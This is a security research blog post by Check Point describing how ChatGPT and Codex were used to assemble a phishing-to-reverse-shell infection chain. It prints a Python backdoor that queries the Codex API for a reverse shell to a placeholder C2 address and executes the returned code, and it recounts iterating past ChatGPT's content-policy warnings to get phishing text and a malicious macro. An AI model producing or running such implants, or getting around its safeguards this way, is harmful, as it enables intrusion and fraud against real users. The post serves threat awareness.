CATEGORIES

OpwnAI: AI That Can Save the Day or HACK it Away

December 19, 2022

Research by: Sharon Ben-Moshe, Gil Gekker, Golan Cohen

Introduction

Due to ChatGPT, OpenAI’s release of the new interface for its Large Language Model (LLM), in the last few weeks there has been an explosion of interest in General AI in the media and on social networks. This model is used in many applications all over the web and has been praised for its ability to generate well-written code and aid the development process. However, this new technology also brings risks. For instance, lowering the bar for code generation can help less-skilled threat actors effortlessly launch cyber-attacks.

In this article, Check Point Research demonstrates:

  • How artificial intelligence (AI) models can be used to create a full infection flow, from spear-phishing to running a reverse shell
  • How researchers created an additional backdoor that dynamically runs scripts that the AI generates on the fly
  • Examples of the positive impact of OpenAI on the defenders side and how it can help researchers in their day-to-day work

The world of cybersecurity is rapidly changing. It is critical to emphasize the importance of remaining vigilant on how this new and developing technology can affect the threat landscape, for both good and bad. While this new technology helps defenders, it also lowers the required entrance bar for low skilled threat actors to run phishing campaigns and to develop malware.

Background

From image generation to writing code, AI models have made tremendous progress in multiple fields, with the famous AlphaGo software beating the top professionals in the game of Go in 2016, and improved speech recognition and machine translation that brought the world virtual assistants such as Siri and Alexa that play a major role in our daily lives.
Recently, public interest in AI spiked due to the release of ChatGPT, a prototype chatbot whose “purpose is to assist with a wide range of tasks and answer questions to the best of my ability.” Unless you’ve been disconnected from social media for the last few weeks, you’ve most likely seen countless images of ChatGPT interactions, from writing poetry to answering programming questions.
However, like any technology, ChatGPT’s increased popularity also carries increased risk. For example, Twitter is replete with examples of malicious code or dialogues generated by ChatGPT. Although OpenAI has invested tremendous effort into stopping abuse of its AI, it can still be used to produce dangerous code.
To illustrate this point, we decided to use ChatGPT and another platform, OpenAI’s Codex, an AI-based system that translates natural language to code, most capable in Python but proficient in other languages. We created a full infection flow and gave ourselves the following restriction: We did not write a single line of code and instead let the AIs do all the work. We only put together the pieces of the puzzle and executed the resulting attack.
We chose to illustrate our point with a single execution flow, a phishing email with a malicious Excel file weaponized with macros that downloads a reverse shell (one of the favorites among cybercrime actors).

ChatGPT: The Talented Phisher

In the first step, we created a plausible phishing email. This cannot be done by Codex, which can only generate code, so we asked ChatGPT to assist and suggested it to impersonate a hosting company.

Figure 1 – Basic phishing email generated by ChatGPT

Note that while OpenAI mentions that this content might violate its content policy, its output provides a great start. In further interaction with ChatGPT we can clarify our requirements: to avoid hosting an additional phishing infrastructure we want the target to simply download an Excel document. Simply asking ChatGPT to iterate again produces an excellent phishing email:

Figure 2 – Phishing email generated by ChatGPT

The process of iteration is essential for work with the model, especially for code. The next step, creating the malicious VBA code in the Excel document, also requires multiple iterations.

This is the first prompt:

Figure 3 – Simple VBA code generated by ChatGPT

This code is very naive and uses libraries such as WinHttpReq. However, after some short iteration and back and forth chatting, ChatGPT produces a better code:

Figure 4 – Another version of the VBA code

This is still a very basic macro, but we decided to stop here as obfuscating and refining VBA code can be a never-ending procedure. ChatGPT proved that given good textual prompts, it can give you working malicious code.

Codex – An AI, Or the Future Name of an Implant?

Armed with the knowledge that ChatGPT can produce malicious code, we were curious to see what Codex, whose original purpose is translating natural language to code, can do. In what follows, all code was written by Codex. We intentionally demonstrate the most basic implementations of each technique to illustrate the idea without sharing too much malicious code.

We first asked it to create a basic reverse shell for us, using a placeholder IP and port. The prompt is the comment in the beginning of the code block.

Figure 5 – Basic reverse shell generated by Codex

This is a great start, but it would be nice if there were some malicious tools we could use to help us with our intrusion. Perhaps some scanning tools, such as checking if a service is open to SQL injection and port scanning?

Figure 6 – The most basic implementation if SQLi generated by Codex

Figure 7 – Basic port scanning script

This is also a good start, but we would also like to add some mitigations to make the defenders’ lives a little more difficult. Can we detect if our program is running in a sandbox? The basic answer provided by Codex is below. Of course, it can be improved by adding other vendors and additional checks.

Figure 8 – Basic sandbox detection script

We see that we are making progress. However, all of this is standalone Python code. Even if an AI bundles this code together for us (which it can), we can’t be sure that the infected machine will have an interpreter. To find some way to make it run natively on any Windows machine, the easiest solution might be compiling it to an exe. Once again, our AI buddies come through for us:

Figure 9 – Conversion from python to exe

And just like that, the infection flow is complete. We created a phishing email, with an attached Excel document that contains malicious VBA code that downloads a reverse shell to the target machine. The hard work was done by the AIs, and all that’s left for us to do is to execute the attack.

No Knowledge in Scripting? Don’t Worry, English is Good Enough

We were curious to see how far down the rabbit hole goes. Creating the initial scripts and modules is nice, but a real cyberattack requires flexibility as the attackers’ needs during an intrusion might change rapidly depending on the infected environment. To see how we can leverage the AI’s abilities to create code on the fly to answer this dynamic need, we created the following short Python code. After being compiled to a PE, the exe first runs the previously mentioned reverse shell. Afterwards, it waits for commands with the -cmd flag and runs Python scripts generated on the fly by querying the Codex API and providing it a simple prompt in English.

import os
import sys
import openai
import argparse
import socket
import winreg

openai.api_key = <API_KEY>

parser = argparse.ArgumentParser()
parser.add_argument('-cmd', type=ascii, help='Prompt that will be run on infected machine')
args = parser.parse_args()

def ExecuteReverseShell():
  response = openai.Completion.create(
    model="code-davinci-002",
    prompt="\"\"\"\nExecute reverse shell script on a windows machine and connect to IP address <C2_IP_Address> port <C2_Port>.\n\"\"\"",
    temperature=0,
    max_tokens=1000,
    top_p=1,
    frequency_penalty=0,
    presence_penalty=0
  )
  exec(response.choices[0].text)


def ExecutePrompt(prompts):
  response = openai.Completion.create(
    model="code-davinci-002",
    prompt="\"\"\"\n"+prompts+"\n\"\"\"",
    temperature=0,
    max_tokens=1000,
    top_p=1,
    frequency_penalty=0,
    presence_penalty=0
  )
  exec(response.choices[0].text)


if __name__ == '__main__':
  if len(sys.argv) == 1:
    ExecuteReverseShell()
  if args.cmd:
    ExecutePrompt(args.cmd)

Now that we’ve got a few examples of the execution of the script below, we leave the possible vectors of developing this kind of attack to a curious reader:

Figure 10 – Execution of the code generated on the fly based on input in English

Using Codex to Augment Defenders

Up to this point, we have presented the threat actor’s perspective using LLMs. To be clear, the technology itself isn’t malevolent and can be used by any party. As attack processes can be automated, so can mitigations on the defenders’ side.

To illustrate this, we asked Codex to write two simple Python functions: one that helps search for URLs inside files using the YARA package, and another that queries VirusTotal for the number of detections of a specific hash. Even though there are better existing open-source implementations of these scripts written by the defenders’ community, we hope to spark the imagination of blue teamers and threat hunters to use the new LLMs to automate and improve their work.

Figure 11 – VT API Query to check number of detections for a hash

Figure 12 – Yara script that checks which URL strings in a file

Conclusion

The expanding role of LLM and AI in the cyber world is full of opportunity, but also comes with risks.  Although the code and infection flow presented in this article can be defended against using simple procedures, this is just an elementary showcase of the impact of AI research on cybersecurity. Multiple scripts can be generated easily, with slight variations using different wordings. Complicated attack processes can also be automated as well, using the LLMs APIs to generate other malicious artifacts. Defenders and threat hunters should be vigilant and cautious about adopting this technology quickly, otherwise, our community will be one step behind the attackers.

 

 

 

 

POPULAR POSTS

BLOGS AND PUBLICATIONS

  • Check Point Research Publications
  • Global Cyber Attack Reports
  • Threat Research
February 17, 2020

“The Turkish Rat” Evolved Adwind in a Massive Ongoing Phishing Campaign

  • Check Point Research Publications
August 11, 2017

“The Next WannaCry” Vulnerability is Here

  • Check Point Research Publications
January 11, 2018

‘RubyMiner’ Cryptominer Affects 30% of WW Networks